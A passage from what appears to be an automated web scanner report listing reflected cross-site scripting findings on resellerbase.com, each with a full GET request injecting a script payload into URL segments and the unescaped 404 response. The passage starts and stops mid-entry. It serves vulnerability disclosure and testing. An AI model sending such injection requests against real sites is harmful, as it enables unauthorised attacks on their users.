Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/?de014<script>alert(1)</script>11f71656671=1 was not found on this server.</p>
...[SNIP]...

2.5006. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53082<script>alert(1)</script>69501a3e9ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service53082<script>alert(1)</script>69501a3e9ec/domain-names/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service53082<script>alert(1)</script>69501a3e9ec/domain-names/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5007. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 870f7<script>alert(1)</script>d1cbd170507 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names870f7<script>alert(1)</script>d1cbd170507/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names870f7<script>alert(1)</script>d1cbd170507/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5008. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56c6e<script>alert(1)</script>791ca4fb57e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes56c6e<script>alert(1)</script>791ca4fb57e/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes56c6e<script>alert(1)</script>791ca4fb57e/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5009. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b1587<script>alert(1)</script>d57eb3d3764 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosb1587<script>alert(1)</script>d57eb3d3764/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosb1587<script>alert(1)</script>d57eb3d3764/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5010. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7bcc5<script>alert(1)</script>8fcc457f301 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images7bcc5<script>alert(1)</script>8fcc457f301/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images7bcc5<script>alert(1)</script>8fcc457f301/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5011. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9cf47<script>alert(1)</script>faff976493b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating9cf47<script>alert(1)</script>faff976493b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating9cf47<script>alert(1)</script>faff976493b/0.gif was not found on this server.</p>
...[SNIP]...

2.5012. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e40f3<script>alert(1)</script>34644a3f6a5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/0.gife40f3<script>alert(1)</script>34644a3f6a5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/0.gife40f3<script>alert(1)</script>34644a3f6a5 was not found on this server.</p>
...[SNIP]...

2.5013. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e0e3<script>alert(1)</script>f2b45752f55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/0.gif?5e0e3<script>alert(1)</script>f2b45752f55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/0.gif?5e0e3<script>alert(1)</script>f2b45752f55=1 was not found on this server.</p>
...[SNIP]...

2.5014. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38c2c<script>alert(1)</script>da865283983 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service38c2c<script>alert(1)</script>da865283983/domain-names/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service38c2c<script>alert(1)</script>da865283983/domain-names/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5015. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6bcf0<script>alert(1)</script>7ebf85cb04d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names6bcf0<script>alert(1)</script>7ebf85cb04d/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names6bcf0<script>alert(1)</script>7ebf85cb04d/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5016. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fafcb<script>alert(1)</script>63e2e5ca884 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesfafcb<script>alert(1)</script>63e2e5ca884/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesfafcb<script>alert(1)</script>63e2e5ca884/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5017. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d4355<script>alert(1)</script>82da6b08f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosd4355<script>alert(1)</script>82da6b08f7/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosd4355<script>alert(1)</script>82da6b08f7/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5018. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2136a<script>alert(1)</script>9f45d6d61b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images2136a<script>alert(1)</script>9f45d6d61b7/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images2136a<script>alert(1)</script>9f45d6d61b7/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5019. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7291c<script>alert(1)</script>47e69f842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating7291c<script>alert(1)</script>47e69f842/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating7291c<script>alert(1)</script>47e69f842/3half.gif was not found on this server.</p>
...[SNIP]...

2.5020. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload db628<script>alert(1)</script>1ed8d632513 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/3half.gifdb628<script>alert(1)</script>1ed8d632513 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/3half.gifdb628<script>alert(1)</script>1ed8d632513 was not found on this server.</p>
...[SNIP]...

2.5021. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59440<script>alert(1)</script>75c30174560 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/3half.gif?59440<script>alert(1)</script>75c30174560=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/3half.gif?59440<script>alert(1)</script>75c30174560=1 was not found on this server.</p>
...[SNIP]...

2.5022. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9b17<script>alert(1)</script>aaaaff739b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec9b17<script>alert(1)</script>aaaaff739b3/domain-names/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec9b17<script>alert(1)</script>aaaaff739b3/domain-names/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5023. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf693<script>alert(1)</script>a00318231db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesbf693<script>alert(1)</script>a00318231db/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesbf693<script>alert(1)</script>a00318231db/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5024. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0ab7<script>alert(1)</script>ca6a890f4c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesb0ab7<script>alert(1)</script>ca6a890f4c1/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
